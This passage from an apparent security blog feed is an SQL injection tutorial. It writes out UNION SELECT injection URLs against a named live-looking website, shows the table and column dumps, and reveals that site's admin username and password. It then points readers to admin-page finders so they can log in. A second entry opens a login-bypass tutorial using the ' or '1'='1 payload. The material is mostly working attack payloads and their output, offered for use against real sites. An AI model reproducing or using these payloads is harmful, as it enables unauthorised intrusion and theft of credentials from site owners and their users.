&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;27&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;28&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;29&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;30&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;31&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;32&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;33&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;34&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;35&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;36&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;37&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;adminstbl&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;id&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;tuser&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;tusers&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;uid&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;userid&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;user_id&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;auid&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;adminpass&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;LoginID&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;FirstName&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;LastName&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;cms_user&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;cms_member&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;cms_users&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;cms_members&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;cms_admin&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;cms_admins&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;user_admin&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;user_info&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;user_list&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;user_login&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;user_logins&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;user_names&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;userrights&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;userinfo&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;userlist&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;webadmin&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;webadmins&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Webmaster&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Webuser&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;product&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;products&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;tblproducts&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;tblproduct&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;tbl_tbadmin&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Adminlogin&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;We’ll be knowing how to get the tables in the next step.   &lt;/p&gt;
&lt;p&gt;But for now, let’s see what we can get with other statements.  &lt;/p&gt;
&lt;p&gt;Lets try all statements at once shall we.  &lt;/p&gt;
&lt;p&gt;The URL will look like this:&lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(database(),version(),@@datadir,@@hostname,user()),9,10,11--&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;We have almost every information we have about the website.  &lt;/p&gt;
&lt;p&gt;Look close here, we used a command &lt;code&gt;group_concat&lt;/code&gt;.  &lt;/p&gt;
&lt;p&gt;Here’s its function:&lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;Group_concat = Gets every information at once i.e grouping them with the help of statements. Ex. group_concat(database())&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;blockquote&gt;
&lt;p&gt;Note:Group_concat won’t work with versions less than 5&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;Step5-Getting-the-table-names&quot;&gt;&lt;a href=&quot;#Step5-Getting-the-table-names&quot; class=&quot;headerlink&quot; title=&quot;Step5:Getting the table names&quot;&gt;&lt;/a&gt;Step5:Getting the table names&lt;/h2&gt;&lt;p&gt;What are tables?  &lt;/p&gt;
&lt;p&gt;Tables contain columns and columns contain the data.  &lt;/p&gt;
&lt;p&gt;&lt;code&gt;It&amp;#39;s like a stack (table) of books (columns) and data inside the books (data inside the columns)&lt;/code&gt;.  &lt;/p&gt;
&lt;p&gt;Alright, first lets look up some functions we’re gonna use to extract table names (Important).  &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;7&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;group_concat = grouping up data to a specific statement&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;table_name = tables names to be shown on screen&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;from = location of a specified statement&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;information_schema.tables = information in the database with table names in it&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;table_schema = tables in a database&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;database() = current database in the website&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;0x0a = a Hex code that creates a new line for organizing tables in an order&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now lets combine those functions and make up a query that will give us the table names.  &lt;/p&gt;
&lt;p&gt;So, here’s what our link will look like:&lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(table_name,0x0a),9,10,11 from information_schema.tables where table_schema=database()--&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;In here, we replaced our vulnerable column with &lt;code&gt;group_concat(table_name,0x0a)&lt;/code&gt; and then we added a &lt;code&gt;from information_schema.tables where table_schema=database()--&lt;/code&gt; after the last column (excluding the two hyphens after 11).  &lt;/p&gt;
&lt;p&gt;Results on table names:&lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;pdigclicks ,pdigengine ,pdigexcludes ,pdigincludes ,pdigkeywords ,pdiglogs ,pdigsite_page ,pdigsites ,pdigspider ,pdigtempspider ,tbladmin ,tblbanner ,tblbanner_page ,tblfaq ,tblncategory ,tblnews&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Alright now that we’ve found the tables, what you’re gonna have to do is&lt;br&gt;that, you have to find tables where user/admin information are stored.  &lt;/p&gt;
&lt;p&gt;In this case, “tbladmin” seems to be having an admin information stored in it.  &lt;/p&gt;
&lt;p&gt;It’s all about predicting and expecting what’s behind every table you see.  &lt;/p&gt;
&lt;p&gt;Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.  &lt;/p&gt;
&lt;p&gt;Replace and Add the following &lt;code&gt;Vulnerable Column = replace with &amp;quot;group_concat(table_name,0x0a)&amp;quot;&lt;/code&gt;. After the last column = Add &lt;code&gt;&amp;quot;from information_schema.tables where table_schema=database()--&amp;quot;&lt;/code&gt;. &lt;/p&gt;
&lt;p&gt;Also, don’t forget about &lt;strong&gt;UNION SELECT&lt;/strong&gt; before the column numbers and the hyphen (-) before “X” at &lt;code&gt;index.php?id=X&lt;/code&gt; where “X” is a random integer/string.  &lt;/p&gt;
&lt;h2 id=&quot;Step6-Getting-Columns-from-Tables&quot;&gt;&lt;a href=&quot;#Step6-Getting-Columns-from-Tables&quot; class=&quot;headerlink&quot; title=&quot;Step6:Getting Columns from Tables&quot;&gt;&lt;/a&gt;Step6:Getting Columns from Tables&lt;/h2&gt;&lt;p&gt;Alright obviously, our next task is to get the column names from a specific table which in our case was “tbladmin’.  &lt;/p&gt;
&lt;p&gt;To do this, we’re gonna have to alter some queries a bit.  &lt;/p&gt;
&lt;p&gt;Now look closely at this syntax:  &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(column_name,0x0a),9,10,11 from information_schema.columns where table_name=0x74626c61646d696e--&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Here’s what we replaced:  &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;table_name = replaced by &amp;quot;column_name&amp;quot;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;information_schema.tables = replaced by &amp;quot;information_schema.columns&amp;quot;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;table_schema = replaced by &amp;quot;table_name&amp;quot;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;database() = replaced by &amp;quot;0x74626c61646d696e--&amp;quot;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now that you know the replacements in our syntax, you still might be wondering what’s up with the last part where entered “0x74626c61646d696e–”.  &lt;/p&gt;
&lt;p&gt;First of all, these are known as Hex.  &lt;/p&gt;
&lt;p&gt;To make a Hex readable, we put &lt;code&gt;0x&lt;/code&gt; at the beginning.  &lt;/p&gt;
&lt;p&gt;I’ll explain this briefly. So our table name was “tbladmin”.  &lt;/p&gt;
&lt;p&gt;To enter that table using the syntax above, we have to convert that table name to Hex.  &lt;/p&gt;
&lt;p&gt;In order to do that, visit this website:&lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.swingnote.com/tools/texttohex.php&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;It’s a text to hex converter.  &lt;/p&gt;
&lt;p&gt;Enter “tbladmin” in the text box and hit convert.  &lt;/p&gt;
&lt;p&gt;You’ll notice the results will be “74626c61646d696e” (that’s the hex).  &lt;/p&gt;
&lt;p&gt;Now to make it readable to the website, add “0x” at the beginning.  &lt;/p&gt;
&lt;p&gt;So it will be: &lt;code&gt;0x74626c61646d696e&lt;/code&gt;.  &lt;/p&gt;
&lt;p&gt;Now you know how Hex works, lets look up some functions we replaced and know their uses (Important).  &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;group_concat(column_name,0x0a) = grouping the column names we&amp;apos;re going to extract&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;information_schema.columns = column names stored in database&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;table_name = extracting column from a specific table&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;0xHEX_Code_Table = Specific table name converted to hex&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Results after extracting column names from tables:&lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;adminid ,username ,password ,dom&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now that we’ve got the columns from that table, it’s time to extract the information.  &lt;/p&gt;
&lt;p&gt;What we’re gonna need here is obviously only the “username” and “password”.&lt;/p&gt;
&lt;h2 id=&quot;Step7-Getting-Data-from-Columns&quot;&gt;&lt;a href=&quot;#Step7-Getting-Data-from-Columns&quot; class=&quot;headerlink&quot; title=&quot;Step7:Getting Data from Columns&quot;&gt;&lt;/a&gt;Step7:Getting Data from Columns&lt;/h2&gt;&lt;p&gt;Alright, lets extract the information.  &lt;/p&gt;
&lt;p&gt;Look closely at the syntax:&lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password,0x0a),9,10,11 from tbladmin--&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Keep this formula-like syntax in your mind whenever you want to extract data from columns.  &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.site.com/index.php?id=-X UNION SELECT N,group_concat(&amp;quot;columnName,0x3a,columnName,0x0a) from &amp;quot;tablename&amp;quot;--&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Where “X” is a random integer/string followed by a hyphen ( - ) while “N” is the number/position of the column and “columnName” is the column you want to extract data while “tablename” is where you extract data from a specific table then two hyphens in the end ( – ).  &lt;/p&gt;
&lt;p&gt;Now for revising: &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;column names = username, password&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;separator = 0x3a (a hex for a colon &amp;quot; : &amp;quot;)&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;table name = tbladmin&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Once you execute that syntax, you get the username and password separated by a colon.  &lt;/p&gt;
&lt;p&gt;Results after executing the syntax:  &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;ishir:ishir123&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h2 id=&quot;Last-Step-Finding-the-admin-page-and-logging-in-for-the-goods&quot;&gt;&lt;a href=&quot;#Last-Step-Finding-the-admin-page-and-logging-in-for-the-goods&quot; class=&quot;headerlink&quot; title=&quot;Last Step: Finding the admin page and logging in for the goods&quot;&gt;&lt;/a&gt;Last Step: Finding the admin page and logging in for the goods&lt;/h2&gt;&lt;p&gt;Alright, now that we have our admin login info:  &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;Username: ishir&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Password: ishir123&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;It’s time to find the login pages. &lt;/p&gt;
&lt;p&gt;To do this, you can use Admin Page Finders:  &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;http://sc0rpion.ir/af/&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://sc0rpion.ir/af/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://www.tools.th3-0utl4ws.com/admin-finder/&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.tools.th3-0utl4ws.com/admin-finder/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://hackforums.net/showthread.php?ti...ight=HaviJ&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;https://hackforums.net/showthread.php?ti...ight=HaviJ&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://hackforums.net/showthread.php?ti...age+finder&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;https://hackforums.net/showthread.php?ti...age+finder&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now all you have to do is enter the admin details you extracted from their databases and login as an admin!&lt;/p&gt;
</content>

    <summary type="html">

      &lt;h2 id=&quot;Preface&quot;&gt;&lt;a href=&quot;#Preface&quot; class=&quot;headerlink&quot; title=&quot;Preface&quot;&gt;&lt;/a&gt;Preface&lt;/h2&gt;&lt;p&gt;The method used to extract information from a data

    </summary>

      <category term="A-SQLi" scheme="http://sec.php101.cn/categories/A-SQLi/"/>


      <category term="Blind" scheme="http://sec.php101.cn/tags/Blind/"/>

      <category term="Boolean Based" scheme="http://sec.php101.cn/tags/Boolean-Based/"/>

  </entry>

  <entry>
    <title>SQLi--PART II:Bypassing Login pages on websites using SQL injectable queries</title>
    <link href="http://sec.php101.cn/2014/10/30/SQLi--PART-IIBypassing-Login-pages-on-websites-using-SQL-injectable-queries/"/>
    <id>http://sec.php101.cn/2014/10/30/SQLi--PART-IIBypassing-Login-pages-on-websites-using-SQL-injectable-queries/</id>
    <published>2014-10-30T10:15:39.000Z</published>
    <updated>2016-10-25T10:29:18.000Z</updated>

    <content type="html">&lt;h2 id=&quot;Preface&quot;&gt;&lt;a href=&quot;#Preface&quot; class=&quot;headerlink&quot; title=&quot;Preface&quot;&gt;&lt;/a&gt;Preface&lt;/h2&gt;&lt;p&gt;Alright in this tutorial, we’ll be learning how to bypass login pages with the help of MySQL injection using Login Queries.   &lt;/p&gt;
&lt;p&gt;Please visit part 1 if you haven’t seen it yet: &lt;a href=&quot;http://tdyhacker.github.io/2014/10/30/MegaSQLi--part-IDorks/&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://tdyhacker.github.io/2014/10/30/MegaSQLi–part-IDorks/&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;What-is-SQL-injection&quot;&gt;&lt;a href=&quot;#What-is-SQL-injection&quot; class=&quot;headerlink&quot; title=&quot;What is SQL injection?&quot;&gt;&lt;/a&gt;What is SQL injection?&lt;/h2&gt;&lt;p&gt;&lt;strong&gt;Answer:&lt;/strong&gt; Basically, it’s a process where you execute a certain query in a website in order to extract information such as log-in information, users etc. for either personal gain or random use from the website’s database.&lt;/p&gt;
&lt;p&gt;There are many type of certain queries that can be executed in order to illegally extract information from the website’s database.  &lt;/p&gt;
&lt;p&gt;In this tutorial the query we’ll be using is Basic SQL injection query where it can be executed in a login page.&lt;/p&gt;
&lt;p&gt;Example:  &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;Username: admin&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Password: ‘ or ‘1’=’1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;When you enter the password “‘or ‘1’=’1” in most website, there’s a chance you can gain access.  &lt;/p&gt;
&lt;p&gt;How does it happen? Look at the code when we execute that query?  &lt;/p&gt;
